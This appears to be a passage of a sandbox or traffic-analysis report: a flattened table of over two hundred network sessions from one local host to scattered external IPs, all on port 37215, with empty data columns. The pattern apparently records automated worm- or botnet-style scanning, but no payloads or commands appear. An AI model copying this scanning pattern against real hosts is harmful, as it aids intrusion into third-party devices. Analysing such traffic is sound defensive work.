                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5650192.168.2.2344992197.171.20.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5651192.168.2.234859432.111.146.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5652192.168.2.235906671.70.230.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5653192.168.2.234218241.90.75.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5654192.168.2.235420637.136.97.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5655192.168.2.2344752157.224.136.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5656192.168.2.235300441.68.25.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5657192.168.2.2339828157.154.21.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5658192.168.2.2333280157.68.68.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5659192.168.2.2346276157.227.19.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5660192.168.2.2358692165.70.31.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5661192.168.2.2334288157.0.63.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5662192.168.2.234496893.109.18.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5663192.168.2.2338972157.113.83.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5664192.168.2.2357654197.232.15.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5665192.168.2.2333476157.216.216.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5666192.168.2.2338044179.56.73.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5667192.168.2.235273041.250.115.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5668192.168.2.2340762197.152.38.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5669192.168.2.2359476173.172.155.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5670192.168.2.2348558197.183.115.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5671192.168.2.2343360157.100.87.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5672192.168.2.235167841.241.73.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5673192.168.2.2350402197.247.154.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5674192.168.2.2355060163.156.54.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5675192.168.2.2332924157.158.97.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5676192.168.2.2353568197.80.243.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5677192.168.2.2352504197.150.30.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5678192.168.2.2347648197.194.95.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5679192.168.2.235992488.82.190.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5680192.168.2.2354042157.30.171.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5681192.168.2.2343898157.232.77.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5682192.168.2.2358524197.38.202.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5683192.168.2.2348506157.50.34.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5684192.168.2.2353922157.148.62.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5685192.168.2.2360174157.206.228.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5686192.168.2.2339768200.122.153.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5687192.168.2.233868241.60.60.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5688192.168.2.2347476197.132.17.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5689192.168.2.2340044197.203.194.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5690192.168.2.235971635.215.76.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5691192.168.2.235663441.102.51.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5692192.168.2.2334028197.246.215.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5693192.168.2.2360132157.92.12.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5694192.168.2.2359530157.111.71.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5695192.168.2.2353454197.110.116.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5696192.168.2.233810441.73.240.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5697192.168.2.2352314197.32.102.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5698192.168.2.235433241.229.227.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5699192.168.2.235852441.245.209.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5700192.168.2.2350546123.99.164.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5701192.168.2.2355088157.201.100.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5702192.168.2.234413270.90.246.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5703192.168.2.2351472157.115.199.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5704192.168.2.2353088163.108.161.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5705192.168.2.2357360157.105.233.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5706192.168.2.2343378122.134.84.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5707192.168.2.2355976157.198.135.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5708192.168.2.233639051.210.84.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5709192.168.2.2348668157.135.250.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5710192.168.2.2342496157.71.57.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5711192.168.2.234546041.94.226.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5712192.168.2.2348714197.52.222.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5713192.168.2.2335646197.11.231.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5714192.168.2.2342042157.64.101.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5715192.168.2.2351212197.42.200.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5716192.168.2.2356554197.163.6.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5717192.168.2.2356980157.13.48.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5718192.168.2.234317441.65.124.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5719192.168.2.2335036197.68.31.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5720192.168.2.234320685.48.183.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5721192.168.2.2348450197.97.255.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5722192.168.2.2336612157.144.39.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5723192.168.2.2341184157.135.196.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5724192.168.2.235341841.241.33.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5725192.168.2.233401241.207.47.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5726192.168.2.2344442197.151.8.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5727192.168.2.2348212157.25.248.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5728192.168.2.233485441.27.37.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5729192.168.2.2342356157.155.147.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5730192.168.2.2360266133.238.60.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5731192.168.2.234023441.94.214.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5732192.168.2.2350776197.124.251.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5733192.168.2.2358350197.187.250.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5734192.168.2.234593299.252.88.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5735192.168.2.2356694157.253.181.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5736192.168.2.234530448.155.243.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5737192.168.2.2334956135.44.252.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5738192.168.2.2339838157.31.250.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5739192.168.2.2349654197.189.114.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5740192.168.2.234990641.70.16.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5741192.168.2.235371450.231.5.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5742192.168.2.2348180157.21.70.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5743192.168.2.2353340197.120.68.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5744192.168.2.236014091.86.142.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5745192.168.2.2352538157.183.28.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5746192.168.2.2358228157.184.152.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5747192.168.2.2349418197.220.73.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5748192.168.2.235623641.148.201.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5749192.168.2.2347054173.95.176.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5750192.168.2.2333680222.107.210.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5751192.168.2.233515441.61.32.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5752192.168.2.2354944109.200.175.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5753192.168.2.2344006197.77.63.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5754192.168.2.234395446.162.34.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5755192.168.2.2345982197.63.237.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5756192.168.2.2345600197.56.125.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5757192.168.2.2353858157.29.230.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5758192.168.2.234532083.87.106.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5759192.168.2.2337538157.1.123.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5760192.168.2.235947641.79.13.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5761192.168.2.234400014.202.131.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5762192.168.2.2346568157.88.159.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5763192.168.2.2359670157.223.16.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5764192.168.2.235758023.211.25.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5765192.168.2.23384449.20.237.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5766192.168.2.2344332157.68.31.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5767192.168.2.2353794197.224.23.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5768192.168.2.233340841.62.85.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5769192.168.2.2355912222.72.245.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5770192.168.2.234373241.190.7.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5771192.168.2.235845641.38.165.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5772192.168.2.2350342197.241.86.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5773192.168.2.234421241.82.98.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5774192.168.2.2359472164.170.206.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5775192.168.2.235083641.129.62.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5776192.168.2.2338570197.21.248.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5777192.168.2.2344226165.23.243.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5778192.168.2.2338102157.110.160.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5779192.168.2.2351426157.213.36.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5780192.168.2.2352502197.69.201.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5781192.168.2.2337158201.22.81.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5782192.168.2.233699241.81.79.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5783192.168.2.234427441.129.177.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5784192.168.2.2341270157.45.135.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5785192.168.2.235001876.125.254.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5786192.168.2.2345626197.219.41.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5787192.168.2.2346560157.83.103.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5788192.168.2.2356418197.103.116.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5789192.168.2.2357112197.254.7.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5790192.168.2.2352250157.247.174.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5791192.168.2.2356818157.120.168.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5792192.168.2.234482041.159.22.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5793192.168.2.2346372157.206.199.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5794192.168.2.2340820157.114.135.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5795192.168.2.233763041.112.90.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5796192.168.2.2354998197.23.51.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5797192.168.2.234752241.29.187.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5798192.168.2.2352938197.106.229.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5799192.168.2.235609841.124.141.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5800192.168.2.235146265.6.71.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5801192.168.2.233569241.41.44.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5802192.168.2.2339976157.190.216.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5803192.168.2.2338702157.27.77.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5804192.168.2.2346174157.119.22.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5805192.168.2.235559841.165.216.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5806192.168.2.2353886209.220.214.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5807192.168.2.2359002148.103.35.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5808192.168.2.233692241.241.234.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5809192.168.2.2352632197.76.164.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5810192.168.2.234254086.102.165.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5811192.168.2.2347834157.195.219.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5812192.168.2.235422041.81.82.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5813192.168.2.2334922148.174.233.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5814192.168.2.2352484157.83.131.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5815192.168.2.2351216157.28.53.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5816192.168.2.2342286157.48.108.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5817192.168.2.234534241.213.17.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5818192.168.2.235733041.17.172.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5819192.168.2.233324281.206.97.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5820192.168.2.235415641.249.9.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5821192.168.2.2344766157.57.110.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5822192.168.2.2336996197.71.210.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5823192.168.2.2352474197.107.70.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5824192.168.2.2343046157.23.115.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5825192.168.2.234347841.122.132.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5826192.168.2.2360240157.196.216.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5827192.168.2.2345752197.97.155.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5828192.168.2.2354490218.229.166.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5829192.168.2.2353316197.196.182.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5830192.168.2.2338540140.238.143.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5831192.168.2.2355828197.176.227.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5832192.168.2.233866499.76.209.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5833192.168.2.234507241.144.202.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5834192.168.2.234096841.130.131.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5835192.168.2.2348444197.185.85.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5836192.168.2.234200241.116.91.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5837192.168.2.235883817.167.94.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5838192.168.2.2333080197.59.236.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5839192.168.2.2360974197.44.141.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5840192.168.2.2345384197.246.139.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5841192.168.2.235824041.243.4.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5842192.168.2.2358306197.9.20.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5843192.168.2.234564241.124.64.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5844192.168.2.2351238157.9.125.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5845192.168.2.2338762197.65.130.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5846192.168.2.2355204157.104.33.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5847192.168.2.2354444157.197.102.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5848192.168.2.2348720157.231.8.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5849192.168.2.2352716110.101.85.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5850192.168.2.2335388197.187.202.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5851192.168.2.2346024157.232.167.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5852192.168.2.2346240197.142.199.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5853192.168.2.2356094166.247.28.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5854192.168.2.2340240113.37.184.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5855192.168.2.2339624197.143.170.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5856192.168.2.2360370157.240.30.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5857192.168.2.235482690.10.177.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5858192.168.2.2347726197.99.212.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5859192.168.2.233303241.251.237.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5860192.168.2.2352920157.204.61.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5861192.168.2.2350300157.212.242.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5862192.168.2.2336890157.197.195.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5863192.168.2.233666041.150.67.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5864192.168.2.235755441.34.156.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5865192.168.2.234597841.164.239.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5866192.168.2.233632241.247.238.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5867192.168.2.2341668197.37.198.16137215
                                          TimestampBytes transferredDirectionData


